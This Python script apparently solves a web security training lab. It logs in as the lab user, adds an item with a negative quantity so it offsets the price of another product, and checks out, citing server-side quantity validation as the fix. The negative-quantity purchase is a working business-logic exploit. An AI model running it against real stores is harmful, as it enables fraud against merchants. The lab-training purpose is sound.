import requests
import sys
import urllib3
from bs4 import BeautifulSoup
import re
# Every request in this script is sent with verify=False, i.e. the server
# certificate is not validated and the peer is unauthenticated. urllib3 would
# emit an InsecureRequestWarning for each such request; suppress that noise.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# HTTP and HTTPS traffic are both routed through a proxy on 127.0.0.1:8080
# (presumably a local intercepting proxy whose CA is not in the trust store,
# which would explain verify=False -- confirm against your setup).
_LOCAL_PROXY = 'http://127.0.0.1:8080'
proxies = dict.fromkeys(('http', 'https'), _LOCAL_PROXY)
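def get_csrf_token(s, url):
    """Fetch *url* and return the CSRF token embedded in its HTML form.

    Args:
        s: Session object used to issue the GET request (its cookies are
            what tie the returned token to later POSTs on the same session).
        url: Absolute URL of a page containing an ``<input name="csrf">``.

    Returns:
        The ``value`` attribute of the first ``<input>`` named ``csrf``.

    Raises:
        ValueError: If the page has no such input or the input carries no
            ``value`` attribute (e.g. an error page or a redirect target
            was returned instead of the expected form).
    """
    # Certificate validation is off and the request goes through `proxies`.
    r = s.get(url, verify=False, proxies=proxies)
    soup = BeautifulSoup(r.text, 'html.parser')

    # soup.find() returns None when nothing matches; subscripting that would
    # surface as an opaque TypeError, so fail with a descriptive error instead.
    field = soup.find("input", {'name': 'csrf'})
    if field is None or not field.has_attr('value'):
        raise ValueError("No CSRF token input found at %s" % url)
    return field['value']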
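def buy_item(s, url):
    """Log in as the lab user and check out a cart holding a negative quantity.

    Sequence performed against the lab instance at *url*:
      1. Fetch the login form's CSRF token and log in as ``wiener``.
      2. POST product 20 to ``/cart`` with quantity ``-16``.
      3. POST product 1 to ``/cart`` with quantity ``1``.
      4. Fetch a fresh CSRF token from the cart page and POST to
         ``/cart/checkout``.

    Defensive takeaway: the flow only matters if the cart endpoint accepts a
    non-positive quantity. The server-side fix is to validate quantity as a
    positive integer on every cart mutation and to re-check the order total
    at checkout rather than trusting client-supplied values.

    Args:
        s: Session object; carries the login cookie across requests.
        url: Base URL of the lab, without a trailing slash.

    Exits the process with status -1 if login fails or if the checkout
    response does not contain the lab's "Congratulations" banner.
    """
    login_url = url + "/login"
    cart_url = url + "/cart"
    checkout_url = url + "/cart/checkout"

    # The login form is CSRF-protected, so its token has to be fetched first.
    csrf_token = get_csrf_token(s, login_url)

    print("(+) Logging in as the wiener user...")
    data_login = {"csrf": csrf_token, "username": "wiener", "password": "peter"}
    r = s.post(login_url, data=data_login, verify=False, proxies=proxies)

    # Guard clause: a failed login is an error just like a failed checkout,
    # so report it through the exit status as well (previously it returned
    # normally and the script exited 0).
    if "Log out" not in r.text:
        print("(-) Could not login as the user.")
        sys.exit(-1)
    print("(+) Successfully logged in as the wiener user...")

    # Cart line with a negative quantity (presumably offsets the price of the
    # next item -- the server is expected to reject this, see docstring).
    data_cart = {"productId": "20", "redir": "PRODUCT", "quantity": "-16"}
    s.post(cart_url, data=data_cart, verify=False, proxies=proxies)

    # Regular cart line: one unit of product 1 (the jacket).
    data_cart = {"productId": "1", "redir": "PRODUCT", "quantity": "1"}
    s.post(cart_url, data=data_cart, verify=False, proxies=proxies)

    # Checkout needs its own CSRF token, taken from the cart page.
    csrf_token = get_csrf_token(s, cart_url)
    data_checkout = {"csrf": csrf_token}
    r = s.post(checkout_url, data=data_checkout, verify=False, proxies=proxies)

    # The lab signals completion with a "Congratulations" banner.
    if "Congratulations" in r.text:
        print("(+) Successfully exploited the business logic vulnerability.")
    else:
        print("(-) Could not exploit the vulnerability.")
        sys.exit(-1)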
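def main():
    """Parse the lab base URL from the command line and run the lab flow.

    Expects exactly one argument: the absolute base URL of the lab
    (scheme included). Exits with status -1 on bad usage.
    """
    if len(sys.argv) != 2:
        print("(+) Usage: %s <url>" % sys.argv[0])
        # The example includes the scheme: the URL is passed to requests
        # unchanged, and a scheme-less host is rejected there.
        print("(+) Example: %s https://www.example.com" % sys.argv[0])
        sys.exit(-1)

    # Paths are appended as url + "/login" etc., so drop any trailing slash
    # to avoid producing "//login".
    url = sys.argv[1].rstrip("/")
    if not url.startswith(("http://", "https://")):
        print("(-) The URL must start with http:// or https://")
        sys.exit(-1)

    s = requests.Session()
    buy_item(s, url)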
# Run the lab flow only when executed as a script, not when imported.
if __name__ == '__main__':
    main()